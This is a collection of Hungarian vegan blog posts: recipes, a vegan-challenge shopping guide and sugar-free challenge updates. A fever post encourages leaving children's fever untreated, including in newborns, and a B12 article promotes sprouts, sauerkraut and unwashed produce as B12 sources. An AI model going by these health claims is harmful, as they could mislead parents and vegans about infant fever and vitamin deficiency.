- 1 közepes csokor leveleskel, szárak eltávolítva, a levelek falatnyi darabokra tépkedve
- 1 db citrom, reszelt héja és kifacsart leve
- 2 gerezd fokhagyma, szeletelve
- 2 ág friss rozmaring, levelei felaprítva
- 3-4 ág friss kakukkfű, levelei felaprítva
- 1 teáskanál chili pehely (vagy friss chili)
- 3-4 evőkanál extra szűz olívaolaj
- só, bors
- 1/2 bögre főtt quinoa
Melegítsük elő a sütőt 180 fokra. Egy tepsire tegyünk sütőpapírt.
Tegyük egy mozsárba a citromhéjat, a fokhagymát, a chili pelyhet, a rozmaringot, a kakukkfüvet, valamint a sót és a borsot és törjük ezt a fűszeres keveréket minél apróbbra. Adjuk hozzá az olívaolajat és citromlevet és jól keverjük el.
Egy tálban keverjük össze a tofu kockákat a citromos fűszer felével és tegyük a tepsire. Süssük 180 fokon kb. 20 percig, amíg átpirulnak. Tegyük a megsült tofu kockákat egy tálba. Ezután a leveleskel darabokat is keverjük össze a megmaradt citromos fűszerrel. Helyezzük a leveleket a tepsire és pirítsuk meg 160 fokon kb. 5-8 perc alatt.
Tálaljuk azonnal a pirított tofut és leveleskelt a megfőtt quinoa-val.
Jalebi, az egyik legnépszerűbb indiai édesség
Egy népszerű indiai édesség, a jalebi receptje következi. Egyike azoknak az édességeknek, melyeket cukorszirupba merítünk, így kapják édes ízüket. A recept Manjulától származik. Készítéséhez szükségünk van egy speciális eszközre: egy kiürült ketchup- vagy mustáros dobozra, amibe majd bele lehet... tovább>>
A 30 NAPOS VEGÁN KIHÍVÁS - BEVÁSÁRLÓ SEGÉDLET:-)
Fotó: urban-eve.hu BEVÁSÁRLÓS SEGÉDLET :-) Ez a bejegyzés arról fog szólni, hogy A 30 NAPOS VEGÁN KIHÍVÁS menüiben szereplő hozzávalókat hol és miként érdemes a leginkább megvásárolni? Illetve mire kell figyelni a konkrét hozzávalók kiválasztásánál? Akinek ezektől eltérő ötletei vannak a témában, ne tartsa magában!;-) Minden segítség segítség! A lista nem teljes, az összes heti hozzávaló összegyűjtéséhez kérlek nézd át az adott heti menüt! MOST AKKOR SOKKAL DRÁGÁBB LESZ AZ ÉTKEZÉSEM, HA EZEKET A DOLGOKAT VESZEM MEG? Viszonyítás kérdése... Szerintem nem feltétlenül...! Ebben a hónapban ugyanis nem fogsz venni húst, tejterméket, tojást, és kenyeret, péksüteményt is csak minimálisan! Ha most kezded átállítani a konyhád erre a fajta étkezésre, akkor bizonyos alap összetevőket meg kell venni, de azok is hosszabb távon kitartanak! HOL ÉRDEMES LEGINKÁBB VÁSÁROLNI? Pl. a DM-ben! Aki olyan helyen lakik - mint én is J -, ahol nincs belátható közelségben biobolt, mindenképpen keresse fel a legközelebbi DM biorészlegét! Nagyon sok bio és jó minőségű, sokszor egyben viszonylag jó árú termékük van (Alnatura termékek)! Bio Webáruházakban! Érdemes körbenézni a neten, és összehasonlítani az árakat, sokszor nagy különbségekkel lehet rendelni! HOZZÁVALÓK BESZERZÉSE ÉS MIRE FIGYELJ RÉSZLETESEN? Növényi tejek Nagyon sokfajta létezik már szerencsére! Én a DM-es Alnatura Zabitalt ajánlom, illetve édesebb ízekhez a Rizsitalt! Ezek összetevői ugyanis csak a tiszta gabona, víz, só és napraforgó olaj! Sok más növényi tej cukrozott, illetve egyéb adalékokkal ellátott! Árban is ez a legkedvezőbb! Ja, és finom!:-) Ára: 1 l = kb. 570 Ft Agave szirup DM ugyancsak! Fontos, hogy bio minőségűt vegyél belőle, mert egyébként mindenfélével higíthatják, és az előállítási folyamatok sem olyan tiszták! 1 üveg (250 ml) kb. 890 Ft Tippnek kaptuk még az Aldit is, ahol ugyancsak biót, és 900 Ft-ért árulnak. Olajos mag krémek Biobolt! Ezekből a krémekből már elég sokfajta létezik, gyakorlatilag 100%-os dióféle összetevő, minden más további adalék nélkül. A vegán étkezés egyik nagyon fontos hozzávalói!! Van pl. mogyorókrém, szezámmag-krém (ez a tahini), mandulakrém, kesudiókrém, diókrém stb. Adott diófélénél, mint pl. a mandulakrém, vagy a szezámmag, lehet kapni sötét és világos verziót. A sötét úgy készül, hogy a mag vékony hártyás része rajtamarad, nincsen lehántolva, és úgy darálják össze, állítják elő a krémet. Na, ezek az olcsóbb verziók! Viszont nem kicsit keserűek! Én már többfélével próbálkoztam és pl. a tahini keserű ízét a sok év alatt még mindig nem sikerült megszoknom... :-) A fehér/ világos változatok azok, amik a lehántolt magból kerültek előállításra. Mint pl. a fehér mandulakrém! Hmmmmm, nagggyon finom!:-) És sajnos naggggyon drága... L L Azt mondanám, hogy ezek a krémek gyak. az egyik legdrágább összetevő-csoportba tartoznak! 1 üveg mandulakrém (250 g) = 3.100 Ft körül 1 üveg kesukrém (250 g) = 2.800 Ft körül Viszont alkalmanként viszonylag keveset használunk belőle, mert nagyon tömény! Helyettesíthető mondjuk bizonyos ételeknél darált diófélével, de nem ugyanaz a hatás.. Használhatod ugyanazt a fajtát kezdetben, hogy ne kelljen kétfélét venni először! Illetve forognak a neten különféle receptek, hogyan készítsük el otthon, nekem még nem sikerült, ált. összeállt a darálóban-mixerben egy gombóccá, és nem nagyon lehetett használni utána... Teljes kiőrlésű tészták Biobolt, vagy pl. Sparban, hiperekben a Barilla teljes kiőrlésű tésztaféléi. Spenót fagyasztva Fontos, hogy tejszínnel nem sűrített parajpürét vegyél! Babfélék Ha esetleg bármi miatt az előre megfőzött, ám konzerves megoldást választod (egyszer-kétszer beleférhet szerintem...), akkor arra nagyon figyelj, hogy az adott konzerv összetevői között csak víz, só és a babféle legyen! Bio csicserit kaphatsz pl. konzervben a DM--ben! Száraz babféléket zöldségesnél, vagy hiperekben, bioboltban. Fekete babot pl. most az Intersparban vettem. A babokat ne felejtsd el mindig előző este beáztatni! Ha puffasztó hatással van rád a fogyasztása, főzéskor tehetsz a vízbe egy kiskanál szódabikarbónát! Szoptatós anyukáknak is javasolt így főzni! Nagyobb mennyiség megfőzése után lefagyaszthatod adagokban! Amaránt puffasztva DM, vagy biobolt! Teljes kiőrlésű kenyér Legyen bio, vagy süss otthon! A hagyományos pékségekben kapható teljes kiőrlésű kenyérnek nevezett kenyerek egyrészt gyakorlatilag mind tartalmaznak tejport, másrészt rengeteg adalékot! Bio kenyérből javaslom a Piszkei Öko termékeit! Bioboltokban, de már Interspar, Kaisers áruházakban is kapható, általában csütörtökön szállítanak a legtöbb helyre frisset! Ha sütni szeretnél, akkor akár a blogomon is találsz néhány félét, de még sok más helyen is a neten! http://www.vegagyerek.hu/search/label/Keny%C3%A9r Akár veszed, akár sütöd, ha túl sok lenne, vágd darabokra, fagyaszd le, és a fogyasztás előtti napon csak kiveszed felolvadni! Cukormentes és agave szirupos lekvár Pl. cukormentes szilvalekvár! Bioboltban, vagy az Interspar saját márkás termékei közül a Prémium Szilvalekvár, annak a gyártója a Tarpai Lekvármanufaktúra! Egy 200 g-os üveg 800 Ft L Agave szirupos eperlekvár kapható a DM-ben, Alnatura termék, 200 g-os üveg 900 Ft körül van... Zabpehely Apró szeműt vegyél, mert az sokkal könnyebben megfő! A DM-ben kapható bióból viszont mostanában sokszor mellényúltam... romlott minőségűek voltak... és nagyon kemény! A Lidl-ben kapható viszont nagyon jól megfő! A legjobb viszont, ha tudsz biót beszerezni mondjuk bioboltból! Cukormentes kukoricapehely, bio kukoricadara DM! Quinoa (ejtsd: kinva) Biobolt! Köles DM! Szójajoghurt A Joya natúr szójajoghurtját keresd! Interspar, Tesco! Az Alpro natúr szójajoghurtja pl. tele van cukorral...! Agar-agar Vörös tengeri moszat kivonat zselésítéshez, biobolt! Őrőlt vaníliapor Biobolt! Tofu A füstölt ízűnek jobb az alapíze, de ebben a DM-est szerintem kivételesen ne vedd!:-) Kapható Interspar, Tesco, Auchan áruházakban! A sajtpultok környékén keresd!
Barackos buci
Egyik nap rápillantottam a szekrény tetején sárgálló baracklekvárra, amit még a szomszédasszonytól kaptunk tavaly. Az udvarán álló sárgabarack fáról származik a termés, csak lefóliázva volt, így hamar megsűrűsödött. Tökéletesen alkalmasnak tűnt süteményt tölteni, vagy gombócot. Áron szerint nagyon jó ízű volt. Az enyémekbe eperlekvár és Carobella keveréke került. Nem lett rossz, de egyértelmű, hogy a Carobellát nem sütésre tervezték. Hozzávalók: 60 dkg liszt (min. 40 dkg tk, 20 dkg fehér) 4 dl szójatej 6 ek olivaolaj 2 ek gyümölcscukor 2 ek zabliszt 2 dkg élesztő 1 tk só sűrű barack, vagy szilvalekvár tölteléknek Használhatunk nyírfacukrot is, vagy sztíviát édesítésnek, de pici méz, vagy gyümölcscukor az élesztő miatt szükséges. A zabliszt puhítja a tészta állagát, azért használom. Az olivaolaj kiváltható pálmazsírral is. Az összes hozzávalót jó alaposan összegyúrjuk, hagyjuk fél órát pihenni, majd kinyújtjuk és kb. 16 egyelő részre vágjuk. Mindegyik kockára kerül egy kanál lekvár, majd a csücsköket a lekvárra hajtjuk egymás után, óvatosan összenyomkodjuk a széleket. Sütőpapírral kibélelt tepsibe helyezzük a bucikat, kb. 20 percet kelesztjük. A végén 30-40 perc alatt közepes lángon megsütjük.
Szójajoghurtos-áfonyás muffin
2013. február 20. Mindennapi ételeink
Azt gondolhatná a blogolvasó, hogy állandóan csak édességet eszünk. Ez természetesen nem így van, csak felhalmozódott az édesség recept (még van kettő, lefotózva a tarsolyomban:), illetve most valóban Az ősz ízei szakácskönyv, ill. egy másik, még nem elárulható projekt miatt több édességet is kipróbáltam, de csak negyed-hatodadagban, így nem lett édességmérgezésünk. Egyébként heti ebédünk így néz ki eddig: V: Fűszeres tepsis csicsóka, rizstejszínes majonézzel, salátával H: Barnarizses-lecsós rakott savanyú káposzta K: Borsófőzelék lepcsánkával Sz: Paprikás krumpli, párolt lilakáposztával. Reggelente köles -és zabkása volt, mindkettőt 2 napig ettük. Estére pedig az alábbi pástétomokat készítettem ezen a héten: vegán májkrém / sárgaborsó-pástétom. Többen kértétek, hogy készítsek majd heti menüt, nos, megtisztelő a kérés, és örülök neki. Igyekszem, csak még idő nem jutott rá. Most jöjjön tehát ismét egy édesség. Hozzávalók: 2 pohár tönkölyliszt 1 rk. foszfátmentes sütőpor 1 pohár nyírfacukor 1 csipet só 4 dl Alpro szójajoghurt (lehet natúr, de ízesített is) 1 pohár kókuszolaj 25 dkg áfonya/gyümölcs Elkészítés: Előbb külön-külön a száraz hozzávalókat összekeverjük, majd a nedveseket is, ez utóbbiba tesszük a gyümölcsöket. Aztán összekeverünk mindent és szilikonos formában 160 fokon kb. 30 perc alatt összesütjük.
Céklakrémes penne pirított mákkal + a második hét cukor nélkül
2013. február 17. Zizi kalandjai
A cukormentes kihívás második hete nagyon könnyen telt. Néha eszünkbe jut a csoki és az édesség, főleg akkor, ha valamilyen nyálcsorgató képet látunk, de nem sóvárgunk különösebben az édesség után. Ha egy sós étel után mégis édesre vágyunk, akkor néhány szem mazsolával orvosoljuk a problémát. Kiderült, hogy a sütést sem kell kizárni teljesen az életünkből, ugyanis sikerült egy mennyei banánkenyeret sütnöm (recept jön!), amiben a banánon kívül nincsen más édesítőszer, mégis finom és édeskés az íze. Sőt! Így, hogy nem eszünk cukrot, számunkra az íze nem édeskés volt, hanem édes. Tegnap pedig hagyományos magyar palacsintát sütöttem rizstejjel és cukormentes sárgabarack-, valamint szilvalekvárt kentünk bele. A palacsintába amúgy sem teszek cukrot, a rizstej enyhén megédesítette és pont kellemes volt a savanykás lekvárokkal.
Nagyon sokan beszálltatok a cukormentes kihívásba. Folyamatosan frissítem az első heti beszámolómat az újonnan érkezett linkekkel (aki ír blogot, továbbra is küldje el nekem emailben a heti beszámoló linkjét). Vegasztrománia is kihirdette Facebook oldalán, hogy nagyböjt idejére, egészen húsvétig lemond a cukorról, a csokiról és egyéb édességekről. Hajrá, Anna!
A szabályok továbbra is ugyanazok: aki a nyereményjátékban is részt kíván venni, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén (csak az kerül bele a kalapba, aki mind a négy heti beszámolóhoz ír néhány sort vagy blogbejegyzést). Aki pedig használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk!
Akik a második cukormentes hétről beszámoltak:
- Orsi - Wannabe Chef
Most pedig jöjjön ez a nagyon vörös, látványra is különleges, és ízorgiát tartogató tésztás étel...
Céklakrémes penne pirított mákkal
Hozzávalók 2 főre:
- 200 g penne tészta
- 3 közepes cékla, meghámozva, felkockázva
- 3-4 gerezd fokhagyma, meghámozva, felaprítva
- 2 ág friss vagy 1 teáskanál szárított kakukkfű
- 4 evőkanál olívaolaj
- 1 evőkanál balzsamecet
- 1/2 bögre zöldségalaplé
- 1/4 bögre tejszín (vagy zabtejszín)
- 60 g parmezán (vagy növényi sajt), reszelve
- 1 evőkanál mák
- só, bors
(A recepthez használt bögre 250 ml-es.)
Egy tálban keverjük össze a felkockázott céklát két evőkanál olívaolajjal, a kakukkfűvel és ízlés szerint sóval, borssal. Öntsük egy tepsibe és 180 fokon süssük puhára 30-40 perc alatt. Az utolsó 10 percben szórjuk rá az aprított fokhagymát (azért a végén, hogy ne égessük meg).
A megsült fokhagymás céklát tegyük konyhai robotgépbe, adjuk hozzá a balzsamecetet, még két evőkanál olívaolajat, a reszelt parmezán felét és dolgoztassuk a gépet, amíg teljesen sima, pürés állagú lesz. Ekkor öntsük egy lábasba és adjuk hozzá az alaplevet, a tejszínt és a maradék parmezánt. Jól keverjük el, ha szükséges, még sózzuk, borsozzuk és melegítsük össze 6-8 perc alatt.
Közben főzzük meg sós vízben a pennét al dente (fogkemény) állagúra, szűrjük le és tegyük félre. Egy száraz serpenyőben közepes láng felett pedig pirítsuk meg a mákot 2-3 perc alatt.
A megfőtt tésztát keverjük össze a céklakrémes szósszal és tálaljuk azonnal. Szórjuk meg a pirított mákkal, friss kakukkfűvel és egy kevés parmezánnal.
Jó étvágyat!
Gesztenyés csicsóka
A jó nehéz ebédem után megkívántam egy kis édeset Szerencsére a múltkor ástam ki csicsókát, így percek alatt készen is volt a finomság ? Hozzávalók: 25 dkg bio gesztenyemassza 3 csicsóka 1 kk csokireszelék A gesztenyét átnyomjuk a krumpli-nyomón, és tányérkára teszünk belőle. Lereszelünk egy csicsókát, az jöhet a gesztenyére. Megszórjuk csokireszelékkel, és díszíthetjük vörös [...]
Miért NE CSILLAPÍTSUNK lázat a gyereknek?
Az előző bejegyzésemben már utaltam arra a cikkre, ami alapján 3 évvel ezelőtt mi is elkezdtük a lázcsillapítás elhagyását a gyerekeknél. Azóta egyébként több homeopátiás gyermekorvossal is konzultáltam az ügyben, sőt konkrétan ezt a cikket is megmutattam nekik, és mindannyian egyetértően bólogattak és helyeseltek! Azt gondolom, minél több gyereke, és ezáltal rutinja is van az embernek, annál könnyebben kezeli ezeket a helyzeteket... És bevallom, a Kicsinél azért megvártuk a 3 éves kort, amíg mi úgy éreztük, hogy kellő rátermettséggel tudjuk alkalmazni a módszert a saját gyerekünknél. De van több olyan ismerősöm, akik már újszülött gyermeküknél is ezt alkalmazták! Ha van kérdésetek a témával kapcsolatban, szívesen válaszolok! Szóval, mivel sajnos úgyis aktuális a téma az influenzajárvány miatt, íme a cikk a Házipatika oldaláról: A lázcsillapítási láz csillapításaTények és tévhitek a gyermekkori lázról és lázcsillapításrólSzerző: Dr. Szijjártó László A láz nem káros és nem veszélyes! Csillapítani nem kell, csak lehet! A lázcsillapítás célja a gyermek közérzetének javítása. A hűtőfürdő és priznic többnyire csak gyermekkínzás, ezért a világ fejlett országaiban már sehol sem javasolt! A lázat a múltban veszélyes tünetnek tartották mind a betegek, mind az orvostudomány. Az infekciók eredményes kezelésével és megelőzésével a láz mára Európában és a gazdaságilag fejlett országokban többnyire enyhe lefolyású vírusfertőzések kísérő tünete. Az elmúlt évtizedek kutatásai bizonyították a láz egyértelműen hasznos szerepét a fertőzéssel szembeni harcban. Eddig nem jelent meg olyan orvosi közlemény, mely a gyermekkori fertőzéseket kísérő gyakran magas láz káros vagy veszélyes voltát igazolná. Ezzel szemben tudományos vizsgálatok bizonyítják, hogy lázcsillapítók adásával nem lehet megelőzni a kisgyermekeknél gyakran előforduló lázgörcsöt. Ma már lázgörcs esetén sem adnak lázcsillapítókat és egyáltalán nem javasolják a lázgörcsös gyermek hűtését fizikai módszerekkel. A világ azon országaiban (Kanada, Hollandia), ahol az orvosok igyekeznek tudományosan igazolt tényekre alapozni a mindennapi gyógyítás gyakorlatát már évtizedek óta felhagytak a láztól való indokolatlan, de hosszú hagyományokkal rendelkező félelmektől vezérelt agresszív lázcsillapítási gyakorlattal. Más országokban, így hazánkban is ezek a változások sokkal lassabbak, vagy még el sem kezdődtek. Ha Önök egy internetes keresőben a lázcsillapításról szeretnének információt, akkor sajnos még valószínűleg évekig már rég elavult, a modern orvosi szemlélettel ellentétes ajánlásokat fognak nagy tömegben találni. Nehezen fogják tudni eldönteni, hogy kinek higgyenek. Helyzetüket külön megnehezíti, hogy a hazai orvosok, egészségügyi dolgozók többsége is még a régi szemléletben nevelkedett, s így tőlük is a már túlhaladott lázfóbiás tanácsokat hallhatják. Nézzük azokat a tényeket, melyek a lázról való orvosi nézetet és a lázcsillapitási gyakorlatot megváltoztatták. Mi a láz? A láz a normális (36,5-37C foknál magasabb) testhőmérséklet (magasabb, mint 38-38,5C fok), melyet az agyunk hőszabályozó központjának lázkeltő anyagokkal (pyrogének) való ingerlése okoz. Ez leggyakrabban fertőzések, jóval ritkábban daganatok vagy autoimmun betegségek kapcsán jelentkezik. A lázat a szervezetünk fokozott hőtermeléssel és a hőleadás csökkentésével éri el. Ha testhőmérsékletünk magasabb, a kórokozók nagy többsége rosszabbul szaporodik ugyanakkor szervezetünk védekező (immun-) rendszere hatékonyabban küzd ellenük. Vigyázzunk, hogy ne keverjük össze a lázat a hőpangással (hyperthermia), amikor testünk túlmelegedését külső hőforrás okozza (pl. a nap a zárt autóban hagyott kisgyermeknél). Ez esetben a helyes kezelés a test hűtése. A testhőmérsékletet kisgyermekeknél végbélben, nagyobbaknál hónaljban vagy a szájban, esetleg a fülben mérhetjük manapság már digitális hőmérőkkel. Lehet-e káros a láz? Nem, a láz a régi hiedelmekkel ellentétben nem káros és nem veszélyes. A magas láz sem. Nem okoz agykárosodást, nem terheli túl a szervezetet és nem okoz halált. Nem emelkedik spontán 41,7 fok fölé. A lázzal járó szaporább légzés, szívműködés nem veszélyes, és a magasabb testhőmérsékletet biztosító fokozott energiatermelés sem megterhelőbb, mint az intenzív játszás vagy sportolás. A lázgörcsről Hosszú évekig az orvosok is azt hitték, hogy a láz fiatal gyermekeknél görcsöt okozhat. Ezzel szemben az az igazság, hogy ma sem tudjuk pontosan, mi a lázgörcs oka. Azt viszont már biztosan tudjuk, hogy a lázgörcs (lázzal együtt jelentkező, hosszabb-rövidebb ideig tartó eszméletvesztés gyakran izomrángásokkal) bár nagyon riasztó, de egyáltalán nem veszélyes, és lázcsillapítók adásával vagy a test hűtésével nem szüntethető és nem is előzhető meg. Ezért ma már a 3-5 percnél hosszabb lázgörcs kezelésére csak görcsoldót javasolnak, lázcsillapítót vagy fizikai hűtést nem. A legtöbbször a görcs magától elmúlik pár perc alatt. Kell-e csillapítani a lázat? A válasz a fenti kérdésre ma már egészen más, mint amit hosszú évtizedekig nagy erőkkel próbáltak orvos- és védőnő-nemzedékek nagyszüleinkbe és szüleinkbe belénevelni, és amit sajnos még manapság is gyakran hallunk. A lázat nem kell csillapítani. Sem gyógyszerrel, és különösen nem hűtőfürdővel vagy vizes borogatással vagy bármely más eljárással, amit gyermekünk kellemetlennek, esetleg rettenetesnek találhat. Ma már a lázas gyermek felébresztését és fizikai hűtését értelmetlen kínzásnak tartjuk. Mit tegyünk, ha gyermekünk lázas? Próbáljuk meg a betegséget gyermekünk számára elviselhetőbbé tenni és ügyeljünk, hogy időben észrevegyük, ha gyermekünk súlyos betegség tüneteit mutatja. Adjunk neki gyakrabban inni. Ne erőltessük az evést. Hagyjuk, hogy a számára legkellemesebb helyet és helyzetet megtalálja. Ne erőltessük ágyba, ne öltöztessük fel vastag ruhákba, ne takarjuk be meleg paplanokkal, amik a hőleadást gátolhatják. Adjunk rá könnyű, laza ruhát és szellőztessünk a szobájában. De ha fázik, átmenetileg takarjuk be melegen. Mindenképpen fordítsunk rá több figyelmet, szeretetet, gondoskodást. Három hónaposnál idősebb gyermeknek adhatunk lázcsillapító orvosságot, ha rosszul érzi magát vagy fájdalma van. Ilyen esetben nagyon ügyeljünk a helyes adagolásra! Ha a láz mégsem csökken, az nem jelenti azt, hogy gyermeke súlyos beteg és nem szükséges, hogy azonnal orvoshoz vigye... Viszont nagyon fontos, hogy tájékozódjon, milyen panaszok, tünetek esetén kell lázas gyermekét azonnal orvoshoz vinnie vagy legalábbis tanácsot kérnie! Ezzel kapcsolatos információt orvosától kaphat vagy a home.hetnet.nl oldalra kattintva bővebben olvashat a lázról. Névjegy:dr. Szijjártó László gyermekgyógyász Gyermekgyógyász specialistaként dolgozom 1996 óta egy holland városkában, odahaza többek között a pécsi gyermekklinikán és a svábhegyi gyermekgyógyintézetben tevékenykedtem. Elsősorban asztmával, ételallergiával foglalkozom, de emellett a gyermekgyógyászat teljes spektrumát gyakorlom. 2006-tól próbálom a magyar gyermekgyógyász társadalomban a láztól való indokolatlan félelmet eloszlatni és elősegíteni a modern, tudományosan megalapozott nézetek és gyakorlat elterjedését.
Rendelhető aszalványok
2013. február 15. Gitta nyersétel blogja
Viszonteladók jelentkezését várjuk, Budapesten vagy vidéken! Hamarosan itt a tavasz, méregtelenítés, fogyás, ideális időszak a nyers ételek fogyasztásának! A következő termékek várnak arra, hogy az ország különböző pontjain a legjobb bioboltok polcaira kerüljenek, és az ott lakók meg tudják vásárolni őket. Minden termékünk gluténmentes, cukormentes, szójamentes! Minden termékünk nyers, azaz hőkezelés nélkül készült, kizárólag természetes alapanyagokból. Gyümölcslapok: kiszerelés: 4, illetve 12 lap van egy csomagban. Most almalap van raktáron, de egyedi kívánságokat is teljesítünk. GyümölcslapokEzekből a lapokból különféle nyers édességeket tudtok készíteni: zserbót, palacsintát, flódnit... Édes aszalvány az áfonyás muffin, ami sokaknak kedvence, reggelire friss mandulatejjel igazi ínyencség... de csak úgy magában is nagyon jó étel. 10 dkg-os csomagban szállítjuk. áfonyás granolaKókuszos keksz egy nem túl édes, ropogós, finom ropogtatnivaló... Sós aszalványok, egészséges nassolnivalók: Zöldséges ropogós: (hagyományos leveszöldségek, hajdina, lenmag, aszalt paradicsom) Zöldséges ropogós Káposztás tökmagos keksz: (káposzta, napraforgó mag, tökmag, lenmag, fűszerek) Káposztás tökmagos keksz Az árak, a kedvezmények és a szállítás részleteit megbeszéljük egyénileg, írjatok nekem: gitta@nyersetelakademia.hu
Vegán töltelék
2013. február 14. Mindennapi ételeink
Gyermekkorom nagy kedvence volt a töltelék is. Érdekes, hogy akkor sem a húsba töltött részét szerettem, hanem azt, ami kimaradt, és csak úgy be volt rakva a hús mellé, és a tepsiben szépen megsült. Nos, tegnap gondoltam, ünnepi ételt készítek, mert férjem utolsó szigorlata is ötös lett (így ebben a félévben is csak ötöse van:-), megérdemli az ilyen jellegű kényeztetést is. ;-) Nagy kedvenceivel: krumplipürével és dinsztelt vörös káposztával ettük. Hozzávalók: 4 teljes kiőrlésű zsemle 10 dkg metélőhagymás tofu 1 csokor petrezselyem 2 fej vöröshagyma 2 gerezd fokhagyma 4-5 ek. 100%extra szűz olívaolaj 10 dkg gomba (nekem most nem ez volt itthon, hanem ugyanennyi főtt lencse) 3 ek. lenmagpehely 4-5 ek. víz Elkészítés: A zsemléket beáztatjuk, majd egy tálba kinyomkodjuk. A petrezselymet beleaprítjuk, a hagymákat felvágjuk és víz+olaj keverékén megpároljuk, ezt is hozzáadjuk, hozzákeverjük a megfőtt gombát (lencsét), az előzetesen vízbe áztatott lenmagpelyhet, és a nagyon apró kockákra vágott tofut (otthon édesanyám úgy készítette a tölteléket, hogy főtt tojást kockázott bele; ezt imitáltam a tofuval:). Alaposan összekeverjük, sózzuk, majd olajjal kikent tepsibe simítjuk és 180 fokon 25-30 perc alatt összesütjük. TIPP: Tölthetünk vele főtt szójaszeletet, amit utána kipanírozunk és tepsiben kisütünk.
B12 vitamin kérdés
B12 vitamin kérdés Sok húsevő mutogat előszeretettel a B12 vitaminra, mikor a vegetáriánusok arról szeretnék meggyőzni őket, hogy az ember alapjában véve növényevő. A természet valóban úgy alkotta meg a dolgokat, hogy az ember csak a húsból legyen kénytelen beszerezni B12 vitamin szükségletét? Nem, erről szó sincs. A növényevő állatoknak miért nincsen B12 vitamin hiányuk? A növényevő állatok bélrendszerében ezt a vitamint baktériumok termelik. Mikor megesszük az állatokat, részesülünk mi is az ő B12 vitamin raktárából. No, az valóban nem érv, hogy ha egy növényevő állat emésztőrendszere tartalmaz ilyen baktériumokat, akkor az emberé is. Ma úgy tartja a tudomány, hogy az emberi emésztőrendszerben ez a baktériumfajta nem található meg. Miért nem? Nos, mert az egészséges humuszos talajban élő barátságos B12 vitamint termelő baktériumokat a modern mezőgazdaság a vegyszerekkel, a túltrágyázással már szinte teljesen kiirtotta. A modern ember bélrendszere már nem mentes a kemikáliáktól, adalékanyagoktól, így ezek a baktériumok nem tudnak benne megtelepedni, a bélflóra már sérült, holott tény, hogy a teljesen egészséges bélflóra termelne B12 vitamint megfelelő körülmények között. Azonban lehetséges feltételezés, hogy egészséges bélflórával rendelkező embereknél a bélflóra olyan mértékben regenerálódni tud, amely B12 baktériumot képes előállítani. Több táplálkozási szakértő javasolja az állati eredetű termékeket nem fogyasztóknak a B12 vitamin tartalmú táplálékkiegészítők fogyasztását, hiszen, ha nem fogyasztjuk rendszeresen ezt a vitamint, akkor hiányállapot léphet fel kb. 6-10 éven belül. Brian Clement (nyerstáplálkozási szakértő) szerint nincs olyan növényi anyag, ami számunkra megbízható B12 vitamin forrás lehetne. Ám abban is egyetértés van, hogy húsételt és más állati eredetű termékeket fogyasztóknak is kialakulhat B12 vitamin hiányuk. Sőt, az is érdekes tény, hogy azokban az államokban, ahol a húsfogyasztás igen magas, ott a gyakoribb a B12 vitamin hiány, tehát nekik is szükség lehet kiegészítésre ,,modern, civilizált táplálkozásuk mellett. Ugyan az ő táplálékuk tartalmaz B12 vitamint, mégis, külső tényezők (pl. főzés, stressz, magas zsírtartalmú étrend) is befolyásolhatják a felszívódását. A B12 vitamin rendkívül hőérzékeny, és hatékonyságának 85 %-át elveszíti főzés során. Ezzel szemben léteznek olyan, születésüktől fogva vegetáriánus életmódot folytató emberek, akiknek nincs B12 vitamin hiányuk. A tengeri hínár és moszatok (wakame, nori, dulse, kombu) és édesvízi algák (chlorella, spirulina), a csírák is tartalmaznak B12 vitamint, sőt egyes források szerint a savanyú káposzta is, ám hogy ez elegendő lenne-e számunkra, még nem tudjuk pontosan, ugyanis létezik ezekben a növényi forrásokban egy bizonyos ,,analóg B12 vitamin, ami megakadályozza a valódi B12 vitamin felszívódását. Victoras Kulvinskas szerint a csírákból teljes értékű B12 vitaminhoz juthatunk. Dr. Douglas N. Graham szerint az ember az idők kezdete óta zöldségekből és gyümölcsökből nyerte a B12 vitamint. Mai növényeinkből azonban szinte már teljesen hiányzik. Mint azt említettem, a termelés módja miatt. Régebben nem használtak vegyszereket a termelékenység fokozására, így a talajból még nem lettek kiirtva a fontos baktériumok (köztük a B12 vitamint termelő baktériumok is). A modern mezőgazdaság viszont műtrágyáival, rovarirtóival, vegyszereivel annyira tönkretette a talaj természetes mivoltát, hogy eltűnt a ma termő gyümölcsökből ez a vitamin. Ha 100-200 éve vagy még több éve vizsgálták volna ezeknek a növényeknek a tápanyagtartalmát, akkor a B12 vitamin is köztük lett volna. Tehát ha a természet rendje szerint élnénk kemikáliák nélkül, akkor téves lenne az a feltételezés, hogy B12 vitamint csak állati eredetű ételekből nyerhetünk. A talaj pusztításával tehát elpusztultak a benne lévő B 12 vitamint termelő baktériumok, kiirtódott a talajban lévő ,,élet, így a növények, zöldségek, gyümölcsök már nem tudták felszívni ezt az anyagot és átadni nekünk. Továbbá manapság fogyasztás előtt szinte mindent megmosunk félve a növényeken lévő permetszerektől, kemikáliáktól. Most már ez így van rendjén, de régen ez a szokás nem volt annyira elterjedt, így a gyümölcsökhöz tapadt kis földdel, ,,kosszal is B12 vitaminhoz juthattak az emberek. Növényi B12 források: csírák, savanyú káposzta (nyers, hőkezeletlen), sörélesztő pehely, algák, házi termesztésű, nem túlzottan megsikált zöldségek. cikk: Vámosi Nóra
Sütőtökös feketebabos taco & quesadilla + az első hét cukor nélkül
2013. február 8. Zizi kalandjai
Taco
Fantasztikusak vagytok! Nem gondoltam volna, hogy ennyien beszálltok a cukormentes kihívásba! Nagyon sok emailt kaptam tele ötletekkel, élményekkel; sokan beszámoltok róla a saját blogotokon, kommenteltek itt a blogon és a Facebookon. Úgy érzem, ez a kis csapat erőt ad minden résztvevőnek, tudjátok, hogy nem vagytok egyedül.
